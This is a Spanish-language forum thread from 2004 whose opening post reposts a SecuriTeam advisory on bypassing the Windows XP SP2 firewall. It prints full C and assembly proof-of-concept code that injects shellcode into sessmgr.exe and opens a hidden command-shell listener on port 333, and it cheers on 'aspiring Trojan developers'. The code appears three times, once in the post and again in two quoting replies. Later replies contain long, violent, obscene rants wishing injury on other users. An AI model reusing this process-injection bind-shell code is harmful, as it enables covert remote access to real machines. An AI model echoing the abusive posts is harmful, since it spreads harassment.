Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

15/10/2004 - 21:38 por \\\\ MeMMiTo // | Informe spam
Title 13/10/2004
Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

Summary
Windows XP Service Pack 2 incorporates many enhancements to try to
better protect systems from malware and other forms of attacks. One of
those layers of protection is the Windows XP SP2 Firewall. One of the
features of this Firewall is the ability to allow users to decide what
applications can listen on the network. By allowing users to control
what applications can communicate on the network, Microsoft believes
that systems will be protected against threats such as Trojans. Like
so many things Microsoft says, this is inaccurate and in fact it is
very easy for locally executing code to bypass the Windows Firewall.
So don't worry you aspiring Trojan developers, your still going to be
able to Trojan consumer and corporate systems to your hearts content.

Attached to this advisory is proof of concept code that demonstrates
how a Trojan could bind to a port and accept connections by
piggybacking on the inherent trust of sessmgr.exe. Simply compile this
program and run it as any local user. To test if the Firewall has been
bypassed (it is!) telnet from another machine to the target machine on
port 333 and if your connected, then you've successfully bypassed the
Windows XP Service Pack 2 Firewall.

Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD
_loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if
(!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

Additional information
The information has been provided by americanidiot.

&"nbsp;"
Copyright © 1998-2004 Beyond Security Ltd. All rights reserved.
Terms of Use Site Privacy Statement.
http://www.securiteam.com/exploits/6A00J0UBGS.html

Preguntas similare

Leer las respuestas

#1 Carlos Lasarte
15/10/2004 - 21:49 | Informe spam
puro spam

Espero que esto resuelva tu problema, sino, no dudes en preguntar de nuevo
Para la Seguridad de tu equipo, instala el SP2 de Windows XP
http://www.microsoft.com/downloads/...p;FamilyID9c9dbe-3b8e-4f30-8245-9e368d3cdb5a

Saludos
Carlos Lasarte

Windows XP Home
"\\ MeMMiTo //" escribió en el mensaje
news:
Title 13/10/2004
Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

Summary
Windows XP Service Pack 2 incorporates many enhancements to try to
better protect systems from malware and other forms of attacks. One of
those layers of protection is the Windows XP SP2 Firewall. One of the
features of this Firewall is the ability to allow users to decide what
applications can listen on the network. By allowing users to control
what applications can communicate on the network, Microsoft believes
that systems will be protected against threats such as Trojans. Like
so many things Microsoft says, this is inaccurate and in fact it is
very easy for locally executing code to bypass the Windows Firewall.
So don't worry you aspiring Trojan developers, your still going to be
able to Trojan consumer and corporate systems to your hearts content.

Attached to this advisory is proof of concept code that demonstrates
how a Trojan could bind to a port and accept connections by
piggybacking on the inherent trust of sessmgr.exe. Simply compile this
program and run it as any local user. To test if the Firewall has been
bypassed (it is!) telnet from another machine to the target machine on
port 333 and if your connected, then you've successfully bypassed the
Windows XP Service Pack 2 Firewall.

Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD
_loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if
(!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

Additional information
The information has been provided by americanidiot.

&"nbsp;"
Copyright © 1998-2004 Beyond Security Ltd. All rights reserved.
Terms of Use Site Privacy Statement.
http://www.securiteam.com/exploits/6A00J0UBGS.html
Respuesta Responder a este mensaje
#2 Nennito
15/10/2004 - 23:14 | Informe spam
"\\ MeMMiTo //" escribió en el mensaje
news:
Title 13/10/2004
Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

Summary
Windows XP Service Pack 2 incorporates many enhancements to try to
better protect systems from malware and other forms of attacks. One of







!!! ME CAGO Y ME MEO EN EL ESPÍRITU SANTO EN LA BOCA DE TÚ PUTREFACTA MADRE
Y EN TODA TÚ MIERDA DE FAMILIA !!!


!!! QUE OJALÁ QUEDES TETRAPLÉGICO DE UN ACCIDENTTE DE TRÁFICO, Y QUE PASES
LARGOS AÑOS EN UNA CAMA LLENO DE TUBOS, SUFRIÉNDO LOS DOLORES MÁS
INSOPORTABLES Y CAGÁNDO CONTINUAMENTE HECES LÍQUIDAS POR TÚ PUTREFACTO CULO
ME CAGO Y ME MEO EN DIOS SÓ ESCORIA DE MIERDA PUTREFACTA !!!


!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA EN TODOS LOS SANTOS
Y EN EL ESPÍRITU SANTO !!!

!!! SO MEMO DE MIERDA ME CAGO Y ME MEO EN LA BOCA DE TÚ PUTREFACTA MADRE, EN
TODA TÚ MIERDA DE FAMILIA PUTREFACTA, Y EN TODOS TÚS CADÁVERES !!!







Acabando con los spamers se acaba con el spam.

Denuncia a los Spamers redireccionando sus mensajes
con propiedades a la administraciones correspondientes.

Incumplimiento LSSI --> info arroba mcyt.es
Software Pirata --> webmaster arroba bsa.org
Delitos Informáticos --> delitos.tecnologicos arroba policia.es
Delitos Informáticos --> uco-delitoinformatico arroba guardiacivil.es
Pornografia Infantil --> denuncias.pornografia.infantil arroba policia.es
Pornografia Infantil --> uco-denunciapedofilia arroba guardiacivil.es
Porn. Inf. Internac. --> children arroba interpol.int

************************



Estaría dispuesto a uno de mís ojos donar
sí mi grave enfermedad mental
por un cáncer o lo que ahora llaman sida pudiera cambiar.
* Nennito *

IP Fija: 80.34.155.11
Respuesta Responder a este mensaje
#3 Alejandro Matos
16/10/2004 - 12:22 | Informe spam
Alguien lo ha probado?
No uso windows, asi que no se como va...comentarios?

Saludos!

Alejandro Matos

\\ MeMMiTo // wrote:
Title 13/10/2004
Writing Trojans that Bypass Windows XP Service Pack 2 Firewall

Summary
Windows XP Service Pack 2 incorporates many enhancements to try to
better protect systems from malware and other forms of attacks. One of
those layers of protection is the Windows XP SP2 Firewall. One of the
features of this Firewall is the ability to allow users to decide what
applications can listen on the network. By allowing users to control
what applications can communicate on the network, Microsoft believes
that systems will be protected against threats such as Trojans. Like
so many things Microsoft says, this is inaccurate and in fact it is
very easy for locally executing code to bypass the Windows Firewall.
So don't worry you aspiring Trojan developers, your still going to be
able to Trojan consumer and corporate systems to your hearts content.

Attached to this advisory is proof of concept code that demonstrates
how a Trojan could bind to a port and accept connections by
piggybacking on the inherent trust of sessmgr.exe. Simply compile this
program and run it as any local user. To test if the Firewall has been
bypassed (it is!) telnet from another machine to the target machine on
port 333 and if your connected, then you've successfully bypassed the
Windows XP Service Pack 2 Firewall.

Details
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}

int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD
_loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");

__asm
{
call over

push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax

xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax

push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax

push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax

push SOMAXCONN
push esi
mov eax,0x66666666
call eax

push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax

push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp

push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax

push INFINITE
mov eax,0x88888888
call eax

over:
pop eax
mov code,eax
}

len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);

return len;
}

void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];

GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);

if
(!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);

context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);

ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;

len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);

ResumeThread(pinfo.hThread);
}

Additional information
The information has been provided by americanidiot.

&"nbsp;"
Copyright © 1998-2004 Beyond Security Ltd. All rights reserved.
Terms of Use Site Privacy Statement.
http://www.securiteam.com/exploits/6A00J0UBGS.html
Respuesta Responder a este mensaje
#4 Benito
04/11/2004 - 00:33 | Informe spam
Joder Nennito, vaya pedazo de firma.

Tenerte tanto tiempo filtrado no es bueno...

Un saludín Joselillo.

"Nennito" escribió en el mensaje
news:ckpehd$cei$


"\\ MeMMiTo //" escribió en el mensaje
news:
> Title 13/10/2004
> Writing Trojans that Bypass Windows XP Service Pack 2 Firewall
>
> Summary
> Windows XP Service Pack 2 incorporates many enhancements to try to
> better protect systems from malware and other forms of attacks. One of





!!! ME CAGO Y ME MEO EN EL ESPÍRITU SANTO EN LA BOCA DE TÚ PUTREFACTA


MADRE
Y EN TODA TÚ MIERDA DE FAMILIA !!!


!!! QUE OJALÁ QUEDES TETRAPLÉGICO DE UN ACCIDENTTE DE TRÁFICO, Y QUE PASES
LARGOS AÑOS EN UNA CAMA LLENO DE TUBOS, SUFRIÉNDO LOS DOLORES MÁS
INSOPORTABLES Y CAGÁNDO CONTINUAMENTE HECES LÍQUIDAS POR TÚ PUTREFACTO


CULO
ME CAGO Y ME MEO EN DIOS SÓ ESCORIA DE MIERDA PUTREFACTA !!!


!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA EN TODOS LOS


SANTOS
Y EN EL ESPÍRITU SANTO !!!

!!! SO MEMO DE MIERDA ME CAGO Y ME MEO EN LA BOCA DE TÚ PUTREFACTA MADRE,


EN
TODA TÚ MIERDA DE FAMILIA PUTREFACTA, Y EN TODOS TÚS CADÁVERES !!!







Acabando con los spamers se acaba con el spam.

Denuncia a los Spamers redireccionando sus mensajes
con propiedades a la administraciones correspondientes.

Incumplimiento LSSI --> info arroba mcyt.es
Software Pirata --> webmaster arroba bsa.org
Delitos Informáticos --> delitos.tecnologicos arroba policia.es
Delitos Informáticos --> uco-delitoinformatico arroba guardiacivil.es
Pornografia Infantil --> denuncias.pornografia.infantil arroba policia.es
Pornografia Infantil --> uco-denunciapedofilia arroba guardiacivil.es
Porn. Inf. Internac. --> children arroba interpol.int

************************



Estaría dispuesto a uno de mís ojos donar
sí mi grave enfermedad mental
por un cáncer o lo que ahora llaman sida pudiera cambiar.
* Nennito *

IP Fija: 80.34.155.11









Respuesta Responder a este mensaje
#5 Nennito
04/11/2004 - 13:00 | Informe spam
"Benito" escribió
en el mensaje news:ceeid.169920$
Joder Nennito, vaya pedazo de firma.

Tenerte tanto tiempo filtrado no es bueno...

Un saludín Joselillo.







!!! ME CAGO Y ME MEO EN EL ESPÍRITU SANTO LA ESCORIA PUTREFACTA DEL BENITO
CUAAANTO TIEMPO !!!


!!! VENGA SÓ ESCORIA DE MIERDA PUTREFACTA DAME MATERIAL PARA MÍ
DESAHOGATERAPIA Y DIVIÉRTEME UN POQUITO ME CAGO Y ME MEO EN DIOS, YÁ VERÁS
QUE BIEN NOS LO PASAMOS ME CAGO Y ME MEO EN LA HOSTIA !!!


!!! VENGA SÓ ESCORIA ME CAGO Y ME MEO EN EL ESPÍRITU SANTO Y EN EL
CALIZ CONSAGRADO AUNQUE HOY ES JUEVES, TOCA TARANTANTAN, Y NO
TENDRÉ MUCHO TIEMPO... PERO LOS MENSAJES DE LAS ESCORIAS QUE ME QUEDEN
HOY ME DESAHOGARÉ CON ELLOS MAÑANA SI HOY NO TENGO TIEMPO ME CAGO Y
ME MEO EN DIOS !!!


COMO VÉS SÓ ESCORIA DE MIERDA PUTREFACTA, SIGUE SIN PODER NADIE CONMIGO Y
SIN CONSEGUIR MOVERME DE MÍ POSICIÓN NI UNA MILÉSIMA DE MILÍMETRO... Y
YÓ SIGO DIVIRTIENDOME CON LAS ESCORIAS DE MIERDA PUTREFACTAS COMO TÚ, Y
SINTIÉNDOME UN GANADOR EN ALGO DÍA TRÁS DÍA ASI ES QUE VENGA SÓ
ESCORIA:


UNETÉ AL BANDO DE LA ESCORIA PUTREFACTA DEL ASQUEAO ASQUEROSO ILLE CORVUS DE
MIERDA, DE LA """ NUEVA """ ESCORIA PUTREFACTA Y """NUEVO """ FICHAJE DE
ESTE GRUPO DEL JULIAN MUÑÓN Y DEMÁS, Y VAMOS A DIVERTIRNOS TODOS ME CAGO Y
ME MEO EN EL ESPÍRITU SANTO Y EN LA BOCA DE TÚ PUTREFACTA MADRE.


POR CIERTO ESCORIA DE MIERDA PUTREFACTA, MIERDA DE LAS MIERDAS ESCORIA DE
LAS ESCORIAS... ¿TE ACUERDAS DE ESTO VERDAD?:




!!! Y ESTAS CAGADAS EN TODO LO DIVINO, ESTÁN PATROCINADAS POR BENITO POR LO
DE JOSELILLO !!!:



!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!

!!! ME CAGO Y ME MEO EN DIOS, EN LA VIRGEN, EN LA HOSTIA, EN TODOS LOS
SANTOS, ME CAGO Y ME MEO EN EL ESPIRITU SANTO, Y EN CUALQUIER TIPO DE
DIVINIDAD !!!




!!! VENGA ME CAGO Y ME MEO EN EL ESPÍRITU SANTO QUE SIGAAAAAAA LA
FIESTAAAAA !!!


!!! ME CAGO Y ME MEO EN EL ESPÍRITU SANTO Y EN EL CALIZ CONSAGRADO !!! !!!
ME CAGO Y ME MEO EN DIOS !!!






Colaboremos entre todos, para acabar con los terroristas, pederastas,
propagadores de virus, spamers, suplantadores de personalidad y demás
delincuentes de la red.

SI ERES VICTIMA O TESTIGO DE ALGÚN TIPO DE DELITO INFORMÁTICO NO TE CALLES:
!!! DENUNCIALO A LAS ADMINISTRACIONES CORRESPONDIENTES !!!

http://delitosinformaticos.com/denuncias.shtml


=

Estaría dispuesto a uno de mís ojos donar
sí mi grave enfermedad mental
por un cáncer o lo que ahora llaman sida pudiera cambiar.
* Nennito *

IP Fija: 80.34.155.11
email Siga el debate Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaRespuesta Tengo una respuesta
Search Busqueda sugerida